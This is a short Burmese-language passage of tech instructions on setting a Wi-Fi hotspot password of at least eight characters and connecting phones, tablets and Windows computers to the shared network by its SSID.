Password ကေတာ့ မိမိ စိတ္ၾကိဳက္ေပးလို႔ ရျပီး အနည္းဆံုး characters အေရအတြက္ (၈) လံုး အထိ ႐ုိက္ထည့္ေပးရပါမယ္။
 ျပီးသြားရင္ေတာ့ Save လုပ္လုိက္ပါ။
တဖက္မွာလည္း အင္တာနက္ လက္ခံအသုံးျပဳမယ့္ မိုဘုိင္းဖုန္းနဲ႔ Tablet မွာ WLAN Settings ထဲကို ၀င္ျပီး အင္တာနက္ လႊင့္ထားတဲ့ SSID
Name ကို ေတြ႔တာနဲ႔ Password ႐ုိက္ထည့္ျပီး အင္တာနက္ အသုံးျပဳႏိုင္ပါတယ္။ ကြန္ပ်ဴတာနဲ႔ အင္တာနက္ အသုံးျပဳခ်င္ရင္ေတာ့ ကြန္ပ်ဴတာရဲ့
Control Panel > Network and Internet > Manage Wireless Networks ထဲမွာ အင္တာနက္ လႊင့္ထားတဲ့ SSID Name ထဲ ၀င္ျပီး Password
႐ုိက္ထည့္ကာ အင္တာနက္ သံုးလို႔ရျပီ

အျပည့္အစံု